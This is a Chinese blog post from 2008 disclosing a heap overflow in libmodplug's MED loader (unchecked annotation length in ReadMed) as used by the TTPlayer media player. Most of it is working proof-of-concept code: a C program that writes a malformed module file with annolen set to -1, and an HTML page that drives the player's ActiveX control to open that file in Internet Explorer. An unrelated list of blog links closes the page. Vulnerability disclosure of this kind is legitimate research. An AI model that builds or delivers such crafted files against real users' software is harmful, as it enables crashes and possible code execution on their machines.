Readers: 9 | Updated: 03-03

千千静听 med 文件格式堆溢出

Translate Into:
author: dummy
e-mail: dummyz@126.com
date: 2008/02/25

千千静听使用的是 libmod 来进行 mod 类文件格式的处理, 此库在 ReadMed 函数中,没有检查
文件描述的长度,如果传递一个恶意构造的值,将导致堆溢出。
现在采用libmod 软件很多,都应该存在此问题。

下面是构造问题文件的代码,最后是使用最新版本千千静听的 ax 写的 poc.
/*
libmodplug v0.8
load_med.cpp
BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
*/

/*
author: dummy
e-mail: dummyz@126.com

date: 2008/02/25
*/

#include <windows.h>
#include <stdio.h>

#pragma pack(1)

typedef struct tagMEDMODULEHEADER
{
DWORD id; // MMD1-MMD3
DWORD modlen; // Size of file
DWORD song; // Position in file for this song
WORD psecnum;
WORD pseq;
DWORD blockarr; // Position in file for blocks
DWORD mmdflags;
DWORD smplarr; // Position in file for samples
DWORD reserved;
DWORD expdata; // Absolute offset in file for ExpData (0 if not present)
DWORD reserved2;
WORD pstate;
WORD pblock;
WORD pline;
WORD pseqnum;
WORD actplayline;
BYTE counter;
BYTE extra_songs; // # of songs - 1
} MEDMODULEHEADER;

typedef struct tagMMD0SAMPLE
{
WORD rep, replen;
BYTE midich;
BYTE midipreset;
BYTE svol;
signed char strans;
} MMD0SAMPLE;

// MMD0/MMD1 song header
typedef struct tagMMD0SONGHEADER
{
MMD0SAMPLE sample[63];
WORD numblocks; // # of blocks
WORD songlen; // # of entries used in playseq
BYTE playseq[256]; // Play sequence
WORD deftempo; // BPM tempo
signed char playtransp; // Play transpose
BYTE flags; // 0x10: Hex Volumes | 0x20: ST/NT/PT Slides | 0x40: 8 Channels song
BYTE flags2; // [b4-b0]+1: Tempo LPB, 0x20: tempo mode, 0x80: mix_conv=on
BYTE tempo2; // tempo TPL
BYTE trkvol[16]; // track volumes
BYTE mastervol; // master volume
BYTE numsamples; // # of samples (max=63)
} MMD0SONGHEADER;

typedef struct tagMMD0EXP
{
DWORD nextmod; // File offset of next Hdr
DWORD exp_smp; // Pointer to extra instrument data
WORD s_ext_entries; // Number of extra instrument entries
WORD s_ext_entrsz; // Size of extra instrument data
DWORD annotxt;
DWORD annolen;
DWORD iinfo; // Instrument names
WORD i_ext_entries;
WORD i_ext_entrsz;
DWORD jumpmask;
DWORD rgbtable;
BYTE channelsplit[4]; // Only used if 8ch_conv (extra channel for every nonzero entry)
DWORD n_info;
DWORD songname; // Song name
DWORD songnamelen;
DWORD dumps;
DWORD mmdinfo;
DWORD mmdrexx;
DWORD mmdcmd3x;
DWORD trackinfo_ofs; // ptr to song->numtracks ptrs to tag lists
DWORD effectinfo_ofs; // ptr to group ptrs
DWORD tag_end;
} MMD0EXP;

#pragma pack()

// Byte swapping functions from the GNU C Library and libsdl

/* Swap bytes in 16 bit value. */
#ifdef __GNUC__
# define bswap_16(x) \
(__extension__ \
({ unsigned short int __bsx = (x); \
((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
static __inline unsigned short int
bswap_16 (unsigned short int __bsx)
{
return ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8));
}
#endif

/* Swap bytes in 32 bit value. */
#ifdef __GNUC__
# define bswap_32(x) \
(__extension__ \
({ unsigned int __bsx = (x); \
((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) | \
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24)); }))
#else
static __inline unsigned int
bswap_32 (unsigned int __bsx)
{
return ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) |
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24));
}
#endif

#ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif

int main()
{
MEDMODULEHEADER mmh;
MMD0SONGHEADER msh;
MMD0EXP mex;
FILE* file;
long p;

memset(&mmh, 0, sizeof (mmh));
memset(&msh, 0, sizeof (msh));
memset(&mex, 0, sizeof (mex));

p = 0;

mmh.id = 0x30444D4D; // version = '0'

p += sizeof (MEDMODULEHEADER);
mmh.song = bswapBE32(p);

p += sizeof (MMD0SONGHEADER);
mmh.expdata = bswapBE32(p);

p += sizeof (MMD0EXP);
mex.annolen = bswapBE32(-1);
mex.annotxt = bswapBE32(p);

file = fopen("test.s3m", "wb+");
if ( file == NULL )
{
printf("create file failed!\n");
}
else
{
fwrite(&mmh, 1, sizeof (mmh), file);
fwrite(&msh, 1, sizeof (msh), file);
fwrite(&mex, 1, sizeof (mex), file);

while ( ftell(file) < 0x1000 )
{
fwrite("AAAAAAAAAAAAAAAAAAAA", 1, 16, file);
}

fclose(file);

printf("successed!\n");
}

return 0;
}

/*
最新的千千静听提供了 ax, 下面是在 Ie 中触发此漏洞。会导致 ie 崩溃。
*/

<html>
<body>
<OBJECT ID="ttp" WIDTH="250" HEIGHT="400" CLASSID="CLSID:89AE5F82-410A-4040-9387-68D1144EFD03">
</OBJECT>
<INPUT TYPE="button" NAME="test" CAPTION="test" onClick="Test()">
<SCRIPT LANGUAGE="JavaScript">
<!--
function Test()
{
var controls = ttp.controls;

ttp.URL = "http:\\127.0.0.1\\test.s3m";
controls.play();
}
//-->
</SCRIPT>
</body>
</html>

From The Blogs

Internet Observation

11-14
精简PPt文件的9条策略
提出了9条策略精简PPt文件,于办公室人员很是有用,随后我会逐一翻译9条措施,该网站并未列出,我还得自采自译 查看全文

Internet Observation

2007
Pando--发送大容量邮件
http://www.pando.com/ Pando是一种免费的个人P2P软件,它能轻松的收发大容量的文件。您需要用电子邮件发送大容量的附件,实时传讯文件或是在网络上发布你的可下载视频吗?那就赶快用... 查看全文

Internet Observation

2007
Post282-建立自己的私人空间
http://www.post282.com Post282是基于网络的开放资源系统,为创建私人社区博客而设计。 Post282不久后将提供免费帐户,您可以建立自己的社区,邀请朋友,您的私人网站也可在... 查看全文

Personal Growth, Career Planning

11-25
回归本原:参考文件
在几乎所有的办公环境中,一个最大的凌乱来源就是没写完的文件。我认为每一个人都至少患有一点维持现状之综合症,这一可怕的疾病导致我们对覆盖在桌子上的任何一片废纸都灌入了神秘的力量使得我们几乎无法舍弃它们。 查看全文

Internet Observation

2007
Carbonite:在线备份与存储
http://www.carbonite.com Carbonite 可以让您轻松进行备份由用户产生的数据。(包括照片、word文档、excel、powerpoint等)。快注册吧,剩下的事就全交给C... 查看全文

E-space

01-31
BitLet加入BT音乐文件在线收听功能
BitLet能够直接通过网页来下载BT文件,只需要提交种子地址即可。现在BitLet又新推出了直接从BitTorrent文件中在线收听音乐的服务BitLet Music,只要种子中包含有ogg或者mp... 查看全文

一五一十部落推荐文章

03-07
微软推出Office Live Workspace文件共享服务
自从Google发布Google Docs以来,Adobe也在去年推出了文件共享服务Adobe Share。一直按耐不住的微软也在去年年底推出了Office Live Workspace英文测试版。最... 查看全文

全文检索博客

03-08
Flex中利用SoundEffect类动态显示MP3文件的ID3信息
在之前的利用Flex的Sound类动态显示导入MP3文件时的ID3信息中,我们了解了如何利用Sound类将一个MP3文件load到Flex中。接下来的例子展示了如何利用SoundEffect类,动态读... 查看全文

全文检索博客

03-08
利用Flex的Sound类动态显示导入MP3文件时的ID3信息
下面的例子展示了在Flex中,如何利用Sound类动态读入MP3文件以及如何利用id3事件(Event.ID3)和Sound对象的id3属性取得MP3文件的ID3信息。 下面是完整的代码:Downlo... 查看全文

爱软

03-08
Locate32:快速地找到目标文件的搜索工具
Locate32是一个可以让你快速地找到目标文件的搜索工具。通过使用数据库技术把文件(可指定任意硬盘、目录及其他存放媒体上的文件)的相关资料保存起来后,在搜索时直接搜索数据库记录达到即搜即有的效果。使... 查看全文
More Articles